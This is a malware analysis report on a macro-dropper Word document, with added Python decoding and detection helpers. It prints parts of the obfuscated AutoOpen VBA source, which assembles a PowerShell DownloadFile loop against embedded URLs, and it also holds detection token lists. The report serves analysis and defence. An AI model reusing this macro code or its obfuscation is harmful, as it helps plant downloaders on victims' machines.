Malicious Office (OLE) — malware analysis report

Static analysis result for SHA-256 9cdfee7af473d4df…

MALICIOUS

Office (OLE)

Size: 189.5 KB
Created: 2017-12-10 21:20:00
Authoring application: Microsoft Office Word
First seen: 2017-12-24
MD5: 1da70d6bdc2ab682bf160578e4b485bb
SHA-1: c619cb5b6b24c970a6ab87156261b85901398c93
SHA-256: 9cdfee7af473d4df32f6ae5d4da0d87559fef76bfabb4be5082a221f7bd702b6
Risk score: 242

Malware Insights

MITRE ATT&CK
T1059.005 Visual Basic T1204.002 Malicious File T1566.001 Spearphishing Attachment

The sample is a Word document (OLE) carrying a VBA project with an AutoOpen entry point. The macro assembles its payload from string fragments: a series of Mid() calls cut fixed windows out of longer junk-padded literals, while the surrounding UCase() assignments concatenate random-looking strings and appear to be decoys. The extracted fragments contain PowerShell constructs (foreach, .DownloadFile(, -rEplAcE with [CHAr]36 and [CHAr]92) and a comma-separated URL list, and the Shell() call flagged below hands the assembled command line to the operating system. The URL quoted by the analyzer, 'http://test.tnl3fpCvf.lt/XRuZlCvp9I/', is only partially de-obfuscated: it still contains the lCv and 3fp filler tokens that are spliced into every fragment and stripped before execution, so the literal host must not be used as an indicator until the decode is completed (for example by detonating the document). The combination of an auto-exec macro, a Shell() call and a downloader loop is characteristic of a macro dropper that fetches and runs a second-stage payload.
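The fragment assembly described above, as an added analysis helper written for this report (it is neither the sample's code nor the scanner's): it evaluates every Mid() call in the macro preview with VBA's 1-based semantics, ignores the UCase() decoy lines, concatenates the fragments in source order and then strips the splice tokens. The sample lines are copied from the preview below; the choice of splice tokens ('+', lCv+lCv, 3fp+3fp), the source-order concatenation and the URL regex are assumptions, because the code that actually assembles and runs the string lies beyond the truncated preview. Treat any host it recovers as a candidate to confirm in a sandbox, not as a final indicator.

```python
import re

# Constructed input: the first UCase() decoy line and the five Mid() lines,
# copied verbatim from the macros.bas preview, so this runs without the sample.
SAMPLE_VBA = r'''
QfapAfZNY = UCase("ahYpwCtv" + "QvqLTtAMr" + "UZZSbHF" + "NiPTzzQPabzN" + "pYbzXjz") + UCase("ZzBuuKlAOzht" + "jMBwwrvDSZ" + "dzfBwSDXH" + "njOYDoiOLdRUjJ" + "aCYsCjGa")
BGztnCPAcY = Mid("wMVOI = IlCv+lCvBKhttp:/lCv+lCv/test.tnlCv+l3fp+3fpCvf.ltlCv+lCv/XRuZlCv+lCvp9I/,http'+':/lCv+lCv/www.lCv+lCJo7UjSir5zGLUz3iR4a", 6, 103)
rztTdp = Mid("iZ8nDlmSkWvtlCv+lCvo3fp+'+'3fpur-talk.com/wplCv+lCv-clCv+lCvontent/lCv+lCvB0wiYi/,h9247o4hioOzFDncbCuFI", 11, 73)
DVvjzOo = Mid("EAszR5UfplCv,[CHAr]3fp+3fp36 -rEplAcE lCvf8slCv,[CHAr]92  -rEplAcE (wCaAUCdXP", 9, 60)
EGFdsG = Mid("1Az4nj516CvxeIBK;lCv+lC'+'vforlCv+lCveach(Zcf'+'lCv+lCvabc in lC3fp+3fpv+lCvZ'+'cfbcd){trlCv+lCvy{ZcffrlCv+lCvanclC'+'v+lCv.DownloadFile(ZclCv+lCvfabc.T3fp+'+'3fpoStrl'+'Cv+lCvQP0JJmQkfJbaorFzniLJLnjjXp6", 10, 167)
iMcVXoMvFfo = Mid("CB9joS0lNDsht5jh5tavaMfXNvplCv+lC3fp+3fpvtionlCv+l3fp+3fpC'+'v.MlCv'+'+lCvelCv+lCvssa'+'ge;}}lCv)-'+'cRePLacElCvZcf3fp+3fMvNL0X0F3", 26, 96)
'''

# name = Mid("literal", start, length); VBA doubles a quote inside a literal as "".
MID_RE = re.compile(
    r'^\s*(\w+)\s*=\s*Mid\("((?:[^"]|"")*)"\s*,\s*(\d+)\s*,\s*(\d+)\s*\)\s*$', re.M)

# Assumed splice filler: each token stands for a quote-plus-quote join ('+')
# at one obfuscation layer. The strip is iterated because the layers nest.
SPLICE_TOKENS = ("'+'", "lCv+lCv", "3fp+3fp")

URL_RE = re.compile(r"https?://[^\s,'\"()]+")


def vba_mid(s, start, length):
    """Mid(s, start, length) with VBA semantics: 1-based start, clipped at the end."""
    if start < 1 or length < 0:
        raise ValueError("VBA Mid requires start >= 1 and length >= 0")
    return s[start - 1:start - 1 + length]


def extract_mid_fragments(vba_source):
    """[(variable, evaluated Mid() result)] in source order; UCase() decoy
    lines do not match the pattern and are ignored."""
    out = []
    for m in MID_RE.finditer(vba_source):
        name, literal, start, length = m.groups()
        literal = literal.replace('""', '"')
        out.append((name, vba_mid(literal, int(start), int(length))))
    return out


def strip_splices(text):
    """Remove the assumed splice tokens until a pass changes nothing."""
    prev = None
    while prev != text:
        prev = text
        for tok in SPLICE_TOKENS:
            text = text.replace(tok, "")
    return text


def find_urls(text):
    return URL_RE.findall(text)


def decode(vba_source):
    """Concatenate the fragments in source order (an assumption; the real
    assembly order is set by code past the preview) and return both the raw
    join and the splice-stripped form."""
    raw = "".join(frag for _, frag in extract_mid_fragments(vba_source))
    return raw, strip_splices(raw)


if __name__ == "__main__":
    raw, norm = decode(SAMPLE_VBA)
    print("URLs in raw fragments   :", find_urls(raw))   # none: 'http:/' is split by filler
    print("URLs after splice strip :", find_urls(norm))
    markers = ("foreach", "DownloadFile", "-rEplAcE", "[CHAr]36", "[CHAr]92")
    print("PowerShell markers      :", [w for w in markers if w in norm])
```

The raw join yields no URL at all, which is why the EMBEDDED_URL heuristic below lists only the schema URI: a plain URL regex over the document never sees "http://" until the filler between "http:/" and "/" is removed.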

Heuristics (7)

  • [critical] CLAMAV_DETECTION: ClamAV signature Img.Dropper.PhishingLure-6443153-0
    ClamAV detected this file as malware: Img.Dropper.PhishingLure-6443153-0
  • [medium] OLE_VBA_MACROS: VBA macros detected (3 related findings)
    Document contains VBA macro code
  • [critical] OLE_VBA_SHELL: Shell() call in VBA
    The macro calls Shell(), which hands a command line to the operating system
  • [high] OLE_VBA_AUTOOPEN: AutoOpen macro
    The project defines AutoOpen, which Word runs automatically when the document is opened
  • [high] OLE_VBA_PCODE_AUTOEXEC_EXEC: VBA p-code auto-exec with execution tokens
    Compiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only documents, and documents whose source extraction failed, where no readable source is available.
  • [medium] OLE_LEGACY_WORDBASIC_AUTOEXEC: Legacy WordBasic auto-exec macro marker
    OLE Word document contains a legacy WordBasic auto-execution marker such as AutoOpen, but no modern VBA project was recovered and no stronger macro-virus family marker was present. This is analyst-facing evidence for old Word macro execution surface, not a downloader or parser-CVE attribution by itself. For this sample a VBA project was in fact recovered (see Extracted artifacts below), so here the finding duplicates OLE_VBA_AUTOOPEN rather than adding independent evidence.
  • [info] EMBEDDED_URL: Embedded URL
    One or more URLs were extracted from the document. The URL itself is not a detection; see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
    URL: http://schemas.openxmlformats.org/drawingml/2006/main (channel: document text, OLE body). This is the standard DrawingML XML namespace URI that Office writes into documents and is not an indicator; the download URLs sit inside the obfuscated macro strings and therefore do not appear in this list.
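A minimal reimplementation of the three macro-execution heuristics listed above (OLE_VBA_AUTOOPEN, OLE_VBA_PCODE_AUTOEXEC_EXEC, OLE_LEGACY_WORDBASIC_AUTOEXEC), written as an added example for this page rather than taken from the scanner. The token lists, the severities and the constructed OLE streams are assumptions; what it shows is the co-occurrence rule: an auto-exec name next to an execution name in a raw stream is a high finding even when no source can be decompressed, while an auto-exec marker alone, with no VBA project recovered, stays medium.

```python
from __future__ import annotations
import re

# Token sets modelled on the heuristic descriptions above; they are assumptions
# for this example, not the scanner's own lists.
AUTOEXEC_TOKENS = ("AutoOpen", "AutoExec", "AutoClose", "Auto_Open",
                   "Document_Open", "Workbook_Open")
EXEC_TOKENS = ("Shell", "CreateObject", "WScript.Shell", "DownloadFile",
               "DownloadString", "powershell")


def tokens_present(blob: bytes, tokens) -> list[str]:
    """Tokens that occur in a raw OLE stream, matched case-insensitively as
    ASCII or UTF-16LE, so identifiers that survive in compiled/cache streams
    count even when the source module cannot be decompressed."""
    found = []
    for tok in tokens:
        encodings = (tok.encode("ascii"), tok.encode("utf-16-le"))
        if any(re.search(re.escape(enc), blob, re.I) for enc in encodings):
            found.append(tok)
    return found


def macro_findings(streams: dict[str, bytes], vba_source: str | None) -> list[tuple[str, str]]:
    """(heuristic id, severity) pairs following the rules in the list above:
    source-level findings need recovered source; an auto-exec token together
    with an execution token in any stream is high on its own; a lone auto-exec
    marker with no recovered VBA project is only medium, analyst-facing evidence."""
    findings = []
    if vba_source:
        findings.append(("OLE_VBA_MACROS", "medium"))
        if re.search(r"\bShell\s*\(", vba_source):
            findings.append(("OLE_VBA_SHELL", "critical"))
        if re.search(r"\bSub\s+AutoOpen\b", vba_source, re.I):
            findings.append(("OLE_VBA_AUTOOPEN", "high"))
    blob = b"\x00".join(streams.values())
    auto = tokens_present(blob, AUTOEXEC_TOKENS)
    execs = tokens_present(blob, EXEC_TOKENS)
    if auto and execs:
        findings.append(("OLE_VBA_PCODE_AUTOEXEC_EXEC", "high"))
    elif auto and not vba_source:
        findings.append(("OLE_LEGACY_WORDBASIC_AUTOEXEC", "medium"))
    return findings


# Constructed streams (not taken from the sample):
# 1. a p-code-style module where source extraction failed but identifiers
#    survive as UTF-16LE and ASCII strings between opaque bytes;
PCODE_ONLY = {
    "Macros/VBA/ThisDocument": b"\x01\x16\x03\x00" + "AutoOpen".encode("utf-16-le")
                               + b"\x00\x41\x00" + b"Shell" + b"\xff\x10",
    "Macros/VBA/_VBA_PROJECT": b"\xcc\x61\xff\xff\x00\x00",
}
# 2. an old Word document with only a legacy AutoOpen marker and no VBA project;
LEGACY_WORDBASIC = {"WordDocument": b"\xec\xa5\xc1\x00AutoOpen\x00\x00"}
# 3. a module whose source was recovered (a harmless stand-in body).
RECOVERED_SRC = 'Sub AutoOpen()\n    Shell("calc.exe")\nEnd Sub\n'
RECOVERED = {"Macros/VBA/Module1": RECOVERED_SRC.encode()}

if __name__ == "__main__":
    for label, streams, src in (("p-code only", PCODE_ONLY, None),
                                ("legacy WordBasic", LEGACY_WORDBASIC, None),
                                ("source recovered", RECOVERED, RECOVERED_SRC)):
        print(label, "->", macro_findings(streams, src))
```

Scanning the raw streams rather than only the decompressed module is what keeps the detection alive when olevba cannot extract source; the price is that a string literal mentioning "Shell" counts as much as a call, which is why the report keeps the p-code finding at high rather than critical.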

Extracted artifacts (1)

Files carved from inside the sample during analysis.

Filename: macros.bas
Kind: vba-macro
Source: oletools.olevba.extract_macros (decoded VBA source)
Size: 73954 bytes
SHA-256: c935bcb1e33ae2b747fd1d5ac6744ac30067bbf63626fbb942a23712387f5168

Preview (first 1,000 lines of the extracted script):
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True

Attribute VB_Name = "MZYvoqVzwI"
Function PpGKCiW()
QfapAfZNY = UCase("ahYpwCtv" + "QvqLTtAMr" + "UZZSbHF" + "NiPTzzQPabzN" + "pYbzXjz") + UCase("ZzBuuKlAOzht" + "jMBwwrvDSZ" + "dzfBwSDXH" + "njOYDoiOLdRUjJ" + "aCYsCjGa")
BGztnCPAcY = Mid("wMVOI = IlCv+lCvBKhttp:/lCv+lCv/test.tnlCv+l3fp+3fpCvf.ltlCv+lCv/XRuZlCv+lCvp9I/,http'+':/lCv+lCv/www.lCv+lCJo7UjSir5zGLUz3iR4a", 6, 103)
YqKGIwiCM = UCase("QoPsjSuXVNc" + "LrISDdLB" + "lsuBLfk" + "TMZzIwokJv" + "OUBPpHhEuOTXNp") + UCase("fvVqUnJABB" + "KCsThui" + "mjjdFudbq" + "AoLHiTtP" + "aJFTANlzi")
FbJXISPiUiG = UCase("QwfkCwtKlasdm" + "vCQoHvwJOW" + "XQffFLjIbHGJu" + "PkHjIQin" + "dpmuzfqHhJv") + UCase("fOifOMULQos" + "crLpaGFHkl" + "pTRhdkA" + "AzjjVcDtDN" + "OpwPRHUBjbD")
iBKwbPkBhi = UCase("ffRtjhinYwS" + "qiminhOPaJ" + "BhViidMjlclc" + "ClYOIubzs" + "lBKoXEhGCWt") + UCase("MKDvJLNhs" + "FUbCIzH" + "ioJCkcYopiDW" + "GYnZOLMkPkLm" + "vpNUwhwVnEG")
rztTdp = Mid("iZ8nDlmSkWvtlCv+lCvo3fp+'+'3fpur-talk.com/wplCv+lCv-clCv+lCvontent/lCv+lCvB0wiYi/,h9247o4hioOzFDncbCuFI", 11, 73)
PvGpQToA = UCase("uuNpMzfraPPsX" + "IpNWNCuHXLsDzZ" + "jTwzLmpH" + "rvYVBwZEsVzi" + "KNBtmWBwIzFjr") + UCase("RvMJShafRdYGYm" + "LdadvJkvRzSGq" + "wSmKCIIjMjzN" + "wXVjwPIwUfF" + "mhzuKzbjwSKlvV")
BmdwPvX = UCase("aaXUWjdV" + "zwodtouwSE" + "PEhibUhWXNSTjP" + "lpPtAiRKvtZrC" + "EZUAIuVsotBBG") + UCase("IjcHOFCFjZDQwt" + "oCdidTnzSYUS" + "AWrzbTCORSdzq" + "svzswcGzrYXdiU" + "KitnJEJiEofq")
DMrwniX = UCase("wSBMvhGrLQfaK" + "RlTUttIEJ" + "QpNzdZcOcAMoGF" + "DHwBIjTJRoiXP" + "HjtJDwFUH") + UCase("lnRwKAdfO" + "qmJCBPzjwKv" + "MvURTiD" + "kizkQURV" + "RKDIlbUZqInzZX")
DVvjzOo = Mid("EAszR5UfplCv,[CHAr]3fp+3fp36 -rEplAcE lCvf8slCv,[CHAr]92  -rEplAcE (wCaAUCdXP", 9, 60)
Eshuf = UCase("XjzhmUuCVj" + "pmBfTbzohf" + "jjJhujMt" + "RljcHYq" + "KZjoBVwXDiOcq") + UCase("IrQAPYFZLpbdG" + "CYYulGi" + "zRhOLJrE" + "QMacsLGISlkOqN" + "PuUiFUqkMA")
WLAZjIYXTF = UCase("SiaVdsjwbFtHmY" + "jzcjiAstbTAr" + "WQJKLCShtwr" + "kLcDrUiB" + "bpXtswa") + UCase("zBdBEbKviwkGE" + "BkZuoQqjzSqYv" + "mRSGrsuuNEj" + "RHJXwuznomTw" + "KwPCLLjf")
dsBcGVmOr = UCase("AKTQjnpc" + "scviaSdVX" + "UFGFkfEUlYwjJ" + "zqhfGZFhrNrjt" + "WrUBvtXEtEikf") + UCase("EEPISFlkk" + "OwjmNtOAmNwuDw" + "PSswdwWtmdnwi" + "nGlGWnzKk" + "ApizRUKASVCns")
EGFdsG = Mid("1Az4nj516CvxeIBK;lCv+lC'+'vforlCv+lCveach(Zcf'+'lCv+lCvabc in lC3fp+3fpv+lCvZ'+'cfbcd){trlCv+lCvy{ZcffrlCv+lCvanclC'+'v+lCv.DownloadFile(ZclCv+lCvfabc.T3fp+'+'3fpoStrl'+'Cv+lCvQP0JJmQkfJbaorFzniLJLnjjXp6", 10, 167)
GUlbUQPZ = UCase("IRidPMtHWUOE" + "iacTvYImAzTwht" + "sCtzEjzstUf" + "tjPwkDLQparPH" + "wITKiiSPPU") + UCase("OASiiizQlOF" + "zjvVdpSKdrji" + "YipwUiRvWVDth" + "rszWItXT" + "jMpZzJwWTjr")
mCsdjM = UCase("GBsEwJaujjwHM" + "hJqFhCvoOYcST" + "jMOANzzVvsNb" + "GIwzKIVSI" + "wGpsSmTciqo") + UCase("UUwtOoMOz" + "GmpjPZRKzTXhR" + "XFhibQikbsoiAQ" + "hGuhDzDDlWuKU" + "UqmCEVJHdmhKV")
bEjiwsVtVEh = UCase("PEHbXqLEdYSd" + "PnkwzRqnbb" + "cTrUQCTHpJljDb" + "DtSIzZJ" + "flbMsdqzodMwEw") + UCase("nbELnPiEhWvNz" + "SbVTYMjppa" + "wJwGqczFCih" + "OWfBhtpzPtiVBr" + "flGzldjoFhz")
iMcVXoMvFfo = Mid("CB9joS0lNDsht5jh5tavaMfXNvplCv+lC3fp+3fpvtionlCv+l3fp+3fpC'+'v.MlCv'+'+lCvelCv+lCvssa'+'ge;}}lCv)-'+'cRePLacElCvZcf3fp+3fMvNL0X0F3", 26, 96)
NkRGcAdJ = UCase("wslYAQQM" + "AOuUCvLhFNr" + "BBbwvjZd" + "ztisGtlV" + "DdHNmoKB") + UCase("MRFcwdDv" + "KcFjqjVAVPcvB" + "LvKOznOmmuc" + "LCXwAoKDb" + "EWmYsmTuZLKruh")
bficum = UCase("uwIuqkjGztLCv" + "dPFfbEw" + "TTvjwRihZTjCvA" + "wokVlima" + "ClAQiZF") + UCase("swdozJoOYPTrT" + "EcIGqrjNOjtri" + "RRzzOrKw" + "SzfvGMTTik" + "jXIbjOIi")
AOhQvfBwkUH = UCase("qJzrBMli" + "QJOnjOdiZW" + "twippTkVGphb" + "AToiYVXCPjz" + "wuKHCUmWpNui") + UCase("BhcQcjji" + "nPawJEzkdMhI" + "ZZNDVvEnmYJWW" + "vlnCOzNHuhDKi" + "FkhzwKICDY")
FYdpSIpKTh = Mid("TYr9o85tCLQU9cuu6SflGnCv,httplCv+l
... (truncated)